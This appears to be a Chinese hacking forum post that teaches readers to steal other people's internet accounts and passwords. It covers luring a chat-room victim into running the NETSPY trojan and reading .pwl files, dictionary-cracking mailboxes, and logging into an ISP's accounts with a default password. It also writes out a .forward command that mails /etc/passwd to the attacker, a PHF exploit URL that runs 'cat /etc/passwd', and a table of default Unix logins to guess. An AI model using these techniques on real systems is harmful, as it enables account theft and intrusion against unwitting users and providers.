找回密码
 注册

QQ登录

只需一步,快速开始

如何得到别人的上网帐号和密码

[复制链接]
发表于 2011-1-12 21:03:35 | 显示全部楼层 |阅读模式
如何得到别人的上网帐号和密码,我在这里介绍几种弱智方法。! B. ~9 D& M$ x, q
方案一:利用特洛伊木马得到帐号。必备工具:NTESPY、PWLVIEW。
# I3 z; r& |4 ?2 I  s8 b! T4 Z, q优点:只要对方运行了程序就有80%的成功率,而且不需要任何网络入侵知识,只要能熟悉的操作上面两个软件即可。NETSPY是全中文软件,一看就会。而PWLVIEW又是弱智操作只要在DOS下输入PWLVIEW然后按回车即可。成功率高,操作简单而且用不了多长时间是它最大的优点,只是......
. _4 H5 v2 z' [# l, j+ \! {) O" C缺点:只有一个,那就是如何让对方乖乖的运行你的程序。- X3 j$ k% G- q, r' u" r6 D
提示:先问清你的目标和你是不是在一个城市。
6 Z, \$ w6 J5 b1 B实战演戏:一天,我在X海聊天室里寻找目标,遇见了同在北京的色鹅丢丢。我上前打招呼:丢丢好呀。丢丢说:你好呀。我又说:XXXXXXX(客套话,先和他拉关系)对了,我拿到了一个新程序,要不要看看?丢丢说:好呀,寄给我吧。
# L3 }) P/ l2 S, F( K6 w, m哈哈,鱼上钩了!先把诱饵程序改个名,如改成readme之类的东东,然后和一些不相干的东西发过去,然后你让他先运行README。在这插一句,有一位大侠使用此法时,竟然把控制端程序和NETSPY的说明文件一起发了过去,真搞不懂他怎么想的。我对他说,你先运行README,是中文说明。丢丢说:好...咦,怎么没反映呀?(YEAH!)我又说:那你直接运行软件吧。丢丢说:好吧...不错...我说:明天见...开始干活,连上他的机子后,现在C盘里找到了WIN95的目录WINDOWS。也有可能是WIN95或WIN98,进入后查找*.pwl,然后把所有后缀名为PWL的文件都抓过来,放在你的工具PWLVIEW的子目录里。在DOS窗口下输入PWLVIEW然后敲回车,丢丢的上网帐号和密码就都显示出来了。而且以后如果他上网,NETSPY就会通知你,他就再也逃不出你的手掌心了。就算是他换了密码,你也能在2分钟内再把他搞定。
+ n: s1 n4 A) B. _3 H/ ]忠告:你用他的帐号上网后第一件事就是先去查看他的上网时间。分析一下他一般几点上网以避免撞车。% x  V8 U* o" c6 p9 Z, k
方案二:利用ISP的疏忽做文章举。例用工具:EMAILCRK或网络刺客) r( x4 ?) ^2 Q; z. N
优点:没什么优点
. k( w6 B/ T8 F5 b缺点:要具体情况具体对待,太麻烦
! }) w  a3 t+ Y提示:平时多多留神。6 ~( F$ {9 l! O) i7 W' B
譬如,某个ISP给你开好了帐号,然后又画蛇添足的给你一个邮箱,地址是:你的帐号@xxx.net
1 p! H0 i$ r0 m& v1 C密码和你的上网密码一样。也就是说,只要你能敲开邮箱的密码就一切OK了。, n" V( g0 w- F- `' C& `2 A7 i
运行EMAILCRK或网络刺客,套上字典后就等着。一般没有XX个小时搞不定,不成功的可能性很大,而且破解时还必须要上网。你的机子要是快可以开上三四个窗口,套上不同的字典一起破' D" u# o: x; ^3 h  @% }# f
方案三:侵入邮局主机然后把PASS档抓回来,然后用JOHN或JACK套上字典开始破。9 M' Q% D9 L9 T& E; v
优点:一次可以破出好多帐号,而且如果运气好还能拿到ROOT,这个主机就要归你控制了。而且破解时不用上网,可以好几台机子一起破。
4 Y0 c& E7 W% e4 y4 P6 n5 e: X* L4 ^缺点:对于初学者有一定困难,尤其是只想拿一个上网帐号这样做恐怕会得不偿失。而且被发现的可能性很大,情节严重且性质恶劣,一定要慎重对待。' i0 D& D  J+ R9 g( t/ I
由于介绍此类的教学文章比较多,我就不班门弄斧了。
* b9 d+ E* B8 n" X9 \
1 L! o0 }1 Z7 L& L2 n哈哈,我来说说最简单的入侵方法。其实入侵大体的原理相同,主要是利用系统的漏洞(BUG)来做文章。
/ I; A% M" f, p只不过有的网站漏洞难找有的好找而已。一个好的黑客,就是要能很快的发现漏洞并加以利用。下面我给大家举一个小栗子。
6 w# ?3 ^. f5 M5 g) S% `" b有一天,我去XX热线申请主页,发现那里采用的是机器自动回信,信的大概格式如下:
  I( \! q" W- N" s. p% H$ `! M) v9 K' i  w$ c0 b, T
------------------------------
% P/ u. @9 Q! ^
! C2 N0 s1 y: k4 Z. oXXX,你好(XX是你在表格上填的名字)4 ?* f1 {  e& F5 [
你在XX热线的主页空间已开通4 p5 c8 C9 v: q  R5 b
帐户名:XXX 密码:112 Z/ m# [4 P% ?; m2 w5 M/ P
-----------XX热线
0 G0 V$ p. o) X# U+ o电话:XXXX-XXXXXXXX
' k" Q  j5 B/ [4 r/ w! @6 I  N------------------------------, F. I! L3 X; C0 t- Q+ @: m0 G
  A9 k# _# E* j  j) r0 I; P  o
好了,由于是机器回信,所以那里所有人的初始密码都是11,而且该热线要更改密码要TELNET到邮局主机去改,有许多网友并没有接触过如何T主机,所以他们使用的还是初始密码11。
/ e" f) P6 N9 C6 I) M6 o' X' h5 ?开始干活了,打开FTP软件,输入XX热线的IP,密码11,然后挨个输入帐户名。帐户名可去XX热线的主页空间列表里查看,先试试AAAA,。。。没成功,再换一个,AABB。。。还是不行。哈哈,这个用户名短,没准能行。输入AA。。。进去了。寄下用户名然后继续试,ABC。。。又成功了,看来没改密码的人很多呀。试几个就行了,现在,你已经拥有这些帐户的控制权了。
4 e8 ]# D0 M& r# E上面的这个栗子很简单,一般象这么大的漏很难找。要侵入一个稍微象点话的站台就要耗费你大量的时间和金钱,而且还未必能成功。即使成功了,你不改它实在无趣,改了恐怕会步马X的后尘。此人侵入贵阳的主机并把界面换成了一张淫秽图片。害的自己吃饭不用花钱了。所以我在这里劝大家一句,把这方面的精力放到全心全意为人民服务上去。实在不行就去聊天室,看谁不听话就炸他,同样很过瘾的!* X( ]% k6 b7 g/ ~3 K
  ; Y1 j; e# ]( O' \8 S
8 b8 H- [- o* m# q" Z
                           如何获得第一个帐号" u, b( L1 N* }% O: r4 f' w; c3 T3 m* v
1 A. r" q4 t, O8 G
我们这种水平不高的黑客入侵都是先得到系统的一个有效帐号,进入后再利用系统BUG得到ROOT权限或想办法得到SHADOW再解密.无论是利用系统漏洞还是得到SHADOW都是有一定规律可寻的,通常你到一些黑客站点找到对应系统相应版本的EXPLOIT编译后执行就行了.我感觉最困难的是获得第一个有效的帐号,有时侯费尽力气也得不到,后来总算是积累了一些经验,想写出来和大家交流一下,希望能抛砖引玉,请高手们把更好的方法告诉我.
- I5 B3 y" F* ^- F( |
  \: ^9 ?' j# t; P( `确定了目标以后,我通常是先用匿名FTP去看一下,许多网站都开匿名FTP,帐号用ANONYMOUS或是FTP,密码用一个EMAIL帐号(当然是假的),进入后到/etc目录下把PASSWD拿回来,一般情况下都是一份很不全的名单,只有几个系统帐号,那就算白来了:-}但有的时候会有比较傻的管理员把一些普通帐号放进去,这就是很重要的信息,虽然只有帐号没有密码,但毕竟迈出了第一步.如果FTP主目录是drwxr-xr-x,做一个.foward文件传上去,在UNIX下的命令应该是echo"| /bin/cat /etc/passwd|sed 's/^/ /'|/bin/mail me@my.e-mail.addr" > .forward然后给匿名用户写一封信,它会把PASSWD发给你。1 r: v4 ?! K) E( G+ R
. n3 `, n- ^# a) p, n- t) T3 s' m
如果目标没有匿名FTP,就通过WWW访问它的主页,看看上面有什么信息,例如通过一些联系人的EMAIL你就可以发现一些帐号,有的网页上甚至列出了EMAIL通讯录,这对黑客来讲就是无价之宝.把这些帐号记下来,非常有用.
1 E; Z- T9 e2 S0 d9 H& M$ X# c) u9 l
以上几个方法都不行的话,那就试试PHF查询.在浏览器的地址栏输入http://攻击目标/cgi-bin/phf/?Qalias=x%0acat%20/etc/passwd如果成功的话会显示出PASSWD来,但是成功率极低:-<
9 {3 X( F+ a4 p: }9 _7 t: m/ O$ R) B
还可以利用目标的FINGER功能来积累帐号,如利用HAKTEK(一种扫描器)来监视目标,一旦有人登陆该主机就会报告给你.但这种方法的缺点就是浪费时间,如果你是自己花钱上网的话可就要出血了!
+ p* h) ^1 e% Q7 g5 {
% R1 q+ C6 }5 @: K很有可能以上的方法都不行,那只好使出我的看家本事了-------猜!!!有一些系统默认的帐号,例如:- G  e; w% z* p$ o- r
! Z$ k6 d. B' c/ O3 J
帐号     密码
, c3 L( `$ A: E# V; A0 p----------- ----------------
8 f; x; x8 S3 p/ Y) b2 ]root    root
& x# e8 x& K6 Ssys     sys/system/bin
+ e  z+ t$ @5 ^bin     sys/bin
1 \' w! X8 c1 u- y' hmountfsys  mountfsys1 j  P& s& u# L0 H4 T
adm     adm
8 l# c: z; U) n$ e8 w. \) E& Guucp    uucp
* o$ e. y" J9 R5 rnuucp    anon: n% }# D9 w1 i& U3 d# \
anon    anon% N4 d% f  Y9 ]9 m+ @
user    user" ]3 A9 `: q. N0 q( F
games    games3 |, o) Q& Y% I. L: V. Y1 k0 y
install   install1 U( ^- |7 E+ g6 |" z3 I$ F9 x
reboot   给 "command login" 用的
& h4 {3 P( I& x. tdemo    demo
0 h+ ?3 S2 H( P" v1 \( W) k( Aumountfsys umountfsys4 z0 v6 O; N$ K- r
sync     sync! K& w0 `7 x) t8 G
admin    admin; i; `8 G/ i3 N+ B6 _6 k# t( h1 z" Z
guest    guest$ G' w  F1 R6 g, j& G, ~1 ^
daemon   daemon5 ?, N" a5 L- J% e7 e* M4 @2 i
________________________________________________________________0 m+ y' U. \" o$ c) h

$ a* ]/ M4 A6 V1 R- o6 T2 G有些管理员忘记把他们改掉,那你就发财了!* X% `. b: J% o* @4 Y$ [& @% _* s7 {
  `  B2 Q+ m4 i; E9 ^
另外还有一些习惯性帐号如:test,www,html,web,oracle,setup,sybase,john,tom等也都应该试一试.
* K' u% [5 F7 O1 u% r) `, E( T* l' t5 w4 W7 N4 n4 ^0 R
只有帐号还不能进入系统,但有了帐号搞密码就容易一些了,主要办法还是猜.如果是通过PASSWD知道帐号的那你应该会发现该用户的许多信息,例如:+ ~) C, ]* H5 `0 ~+ p7 c- g# b8 H7 I8 {
) L! n1 q* E" M8 U) |) V4 k. A
.........  Q& V! `# o/ P

# M& A* O/ Y% i+ J. I: W. Uxlguo:x:263:50:Guo xiaolin:/usr/xlguo:/bin/sh
5 f4 L0 H* i+ V0 ?, D. K0 \* ^, Z$ G% f
qingyuan:x:275:50::/usr/qingyuan:/bin/sh, L1 n6 ~/ r; f' }+ X  X+ z  u
& t: O2 H0 z$ k1 m. S  J
hjhuang:x:278:50:Huang Haijun:/usr/hjhuang:/bin/sh/ V; B7 x$ I, R' J' ~6 y

( Q. l( ?* n3 u; s* Y' Esmlian:x:282:50:Mr. Lan Shumin:/usr/smlian:/bin/sh- K  i. D9 J0 r* H( c7 B  n

- ]. J' x) `  }- h- T- ^0 Ukyc:x:293:50:Department of Science & Technology:/usr/kyc:/bin/sh
8 m- Y7 d1 i- C' J6 T' M
) b. x3 L# U  Y0 E  pbrlu:x:300:50:Lu Baoren:/usr/brlu:/bin/sh
; l: P7 T% x& X' O6 K& x, b3 ^0 Z* O  C+ h! y  w
tide:x:301:50:Wang XinYi:/usr/tide:/bin/sh
0 b- P7 m' x  n6 h5 H: M# O+ M
9 q" x* p4 E% b. x; `% h( r............
3 O7 H" [3 ^1 j7 c$ v# G
- h0 K1 H5 J4 V" W6 ^; K这是一部分PASSWD,从这儿我们可以得到七个帐号,注意每一行的第五项,那是该用户的真实姓名,对!就用它来做密码试.成功率还是比较高的.
" ^+ S4 M1 G  N8 R7 ^. y! G. d
, e6 h+ r* S3 a8 w6 b  ^$ `5 |如果是用其他方法获得帐号的,就用FINGER查询来获得相关信息.例如知道一个帐号support,我们就用网络刺客II里的FINGER项来侦察support@xxx.xxx.xxx会获得很多该帐号的信息例如真名实姓,电话号码等就用这些做密码来猜">如果是用其他方法获得帐号的,就用FINGER查询来获得相关信息.例如知道一个帐号support,我们就用网络刺客II里的FINGER项来侦察support@xxx.xxx.xxx会获得很多该帐号的信息例如真名实姓,电话号码等就用这些做密码来猜.1 S+ e. ]4 s; Y' b. o* ?2 g
% m0 {4 I" ]! N/ n1 G+ T3 O: T
当然最可能的密码还是帐号本身和一些帐号的变形,如帐号是john,密码可能是nhoj,john123,john888等.或是一些简单数字.总之是要费一番工夫来猜的." H( H/ s2 f4 y  J7 z. b+ e

6 T' M6 [( F- P# M7 }如果还猜不出密码,只好用LETMEIN之类的东西来猜,字典一定要好.否则,你的电话费就要.....而且这种方法比较危险,还是不用为好.
( ]$ Q) Q$ n+ @9 e; N: P  C. T" ~0 Q: Q& V2 c" c' i
最后实在不行还有一种比较卑劣的手段,就是给该网站的网管写封信,想办法骗他执行特洛伊木马,然后再.......算了,不说了.
" H! H5 \3 K; m+ u% {% b) @2 m% x5 d' k) U: J6 r) S
你可能发现以上这些方法都不能百分之百的成功,或者说成功率是比较低的,因为我也不知道更好的方法.但我感到一定有一种更好的方法,希望有高手见到此文能告诉我.6 R4 L  Q! S; V) d2 x( j# u
. g/ O! s9 A( H5 j4 ]0 `/ i; A
您需要登录后才可以回帖 登录 | 注册

本版积分规则

QQ|本地广告联系: QQ:905790666 TEL:13176190456|Archiver|手机版|小黑屋|汶上信息港 ( 鲁ICP备19052200号-1 )

GMT+8, 2026-4-30 18:57

Powered by Discuz! X5.0

© 2001-2026 Discuz! Team.

快速回复 返回顶部 返回列表